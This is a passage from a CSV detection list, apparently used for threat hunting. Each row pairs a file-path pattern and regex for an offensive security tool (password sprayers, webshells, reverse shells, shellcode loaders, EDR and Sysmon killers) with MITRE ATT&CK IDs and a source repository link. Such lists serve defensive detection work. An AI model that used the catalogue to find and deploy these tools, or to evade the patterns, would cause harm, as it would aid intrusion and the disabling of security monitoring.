tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpSecDump.exe*",".{0,1000}\\SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpShares.exe*",".{0,1000}\\SharpShares\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpShares\*",".{0,1000}\\SharpShares\\.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*\SharpShares-master*",".{0,1000}\\SharpShares\-master.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*\Sharp-SMBExec.exe*",".{0,1000}\\Sharp\-SMBExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpSniper.exe*",".{0,1000}\\SharpSniper\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpSphere.exe*",".{0,1000}\\SharpSphere\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpSploit.csproj*",".{0,1000}\\SharpSploit\.csproj.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*\SharpSploit.dll*",".{0,1000}\\SharpSploit\.dll.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*\SharpSploit.xml*",".{0,1000}\\SharpSploit\.xml.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*\SharpSploitConsole.*",".{0,1000}\\SharpSploitConsole\..{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*\SharpSploit-master*",".{0,1000}\\SharpSploit\-master.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*\SharpSpray.csproj*",".{0,1000}\\SharpSpray\.csproj.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*\SharpSpray.exe*",".{0,1000}\\SharpSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpSpray.exe*",".{0,1000}\\SharpSpray\.exe.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*\sharpspray.exe*",".{0,1000}\\sharpspray\.exe.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*\SharpSpray.sln*",".{0,1000}\\SharpSpray\.sln.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*\SharpSpray\*",".{0,1000}\\SharpSpray\\.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*\SharpSpray-1.1.zip*",".{0,1000}\\SharpSpray\-1\.1\.zip.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*\SharpSQLPwn.exe*",".{0,1000}\\SharpSQLPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpStay.exe*",".{0,1000}\\SharpStay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpSvc.exe*",".{0,1000}\\SharpSvc\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpTask.exe*",".{0,1000}\\SharpTask\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpTerminator.csproj*",".{0,1000}\\SharpTerminator\.csproj.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*\SharpTokenFinder.exe*",".{0,1000}\\SharpTokenFinder\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpUp.csproj*",".{0,1000}\\SharpUp\.csproj.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\SharpUp.exe*",".{0,1000}\\SharpUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpUp.sln*",".{0,1000}SharpUp.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\SharpUp\*",".{0,1000}\\SharpUp\\.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\SharpUp-master*",".{0,1000}\\SharpUp\-master.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\SharpView.exe*",".{0,1000}\\SharpView\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpWebServer.exe*",".{0,1000}\\SharpWebServer\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpWifiGrabber.exe*",".{0,1000}\\SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpWMI.exe*",".{0,1000}\\SharpWMI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharPyShell*",".{0,1000}\\SharPyShell.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\SharpZeroLogon.exe*",".{0,1000}\\SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Shell3er.ps1*",".{0,1000}\\Shell3er\.ps1.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*\Shell3er-main*",".{0,1000}\\Shell3er\-main.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*\Shellcode Execution\CertEnumSystemStore\*",".{0,1000}\\Shellcode\sExecution\\CertEnumSystemStore\\.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\Shellcode Execution\Enum*",".{0,1000}\\Shellcode\sExecution\\Enum.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\Shellcode Process Injector.csproj*",".{0,1000}\\Shellcode\sProcess\sInjector\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\shellcode.hpp*",".{0,1000}\\shellcode\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*\shellcode_callback.exe*",".{0,1000}\\shellcode_callback\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\shellcode_createproc.xml*",".{0,1000}\\shellcode_createproc\.xml.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*\shellcode_loader.dll*",".{0,1000}\\shellcode_loader\.dll.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","0","N/A","10","9","827","154","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*\shellcode_samples\*",".{0,1000}\\shellcode_samples\\.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\shellcode-xor.py*",".{0,1000}\\shellcode\-xor\.py.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*\shelljack.c*",".{0,1000}\\shelljack\.c.{0,1000}","offensive_tool_keyword","Mara","Mara is a userland pty/tty sniffer","T1055 - T1106 - T1059","TA0002 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/io-tl/Mara/","1","0","N/A","9","1","50","6","2023-12-22T16:52:47Z","2022-08-02T13:02:41Z" "*\sherlock.exe*",".{0,1000}\\sherlock\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*\Shhhavoc.py*",".{0,1000}\\Shhhavoc\.py.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*\Shhmon.*",".{0,1000}\\Shhmon\..{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","216","36","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*\Shhmon.exe*",".{0,1000}\\Shhmon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\ShimDB\sdb-explorer*",".{0,1000}\\ShimDB\\sdb\-explorer.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","1","N/A","9","1","35","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z" "*\ShInject.exe*",".{0,1000}\\ShInject\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - 